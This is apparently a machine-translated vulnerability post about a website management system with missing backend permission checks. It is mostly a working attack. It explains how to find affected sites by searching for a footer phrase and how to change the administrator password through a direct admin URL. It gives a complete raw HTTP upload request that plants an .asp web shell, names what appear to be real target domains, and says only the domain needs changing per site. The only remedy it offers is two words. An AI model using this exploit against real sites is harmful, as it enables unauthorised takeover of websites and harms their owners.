If a website management system has missing permissions, you can directly use getshell to obtain/change the management password.
A website management system has missing permissions. You can use or change the management password to directly use getshell.
Google Search "technical support: thanks to the network" has a lot of results, and I went to the official website to see it. There are indeed many cases.
These problems are caused by a lack of background permissions, or why should I put permission verification at the end of the code ??
First, view and modify the administrator password:
Disable js and directly access:/admin/system/sys_usersEdit.asp? Id = 1
Then directly upload the shell:
Construct Data Packets: you only need to modify the domain name for different websites.
POST /include/upload.asp HTTP/1.1Host: 0512wld.comProxy-Connection: keep-aliveContent-Length: 8338Origin: http://szhylaw.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36Content-Type: multipart/form-data; boundary=----------GI3ae0cH2ae0gL6ae0Ij5KM7ei4Ij5Accept: */*Referer: http://0512wld.com/Admin/slider/sliderAdd.aspAccept-Encoding: gzip,deflateAccept-Language: zh-CN,zh;q=0.8,en;q=0.6Cookie: ------------GI3ae0cH2ae0gL6ae0Ij5KM7ei4Ij5Content-Disposition: form-data; name="Filename"123.jpg------------GI3ae0cH2ae0gL6ae0Ij5KM7ei4Ij5Content-Disposition: form-data; name="Filedata"; filename="123.asp"Content-Type: application/octet-stream123123213------------GI3ae0cH2ae0gL6ae0Ij5KM7ei4Ij5Content-Disposition: form-data; name="Upload"Submit Query------------GI3ae0cH2ae0gL6ae0Ij5KM7ei4Ij5--
Direct submission:
You only need to modify the domain name for different websites.
Solution:
Enhanced verification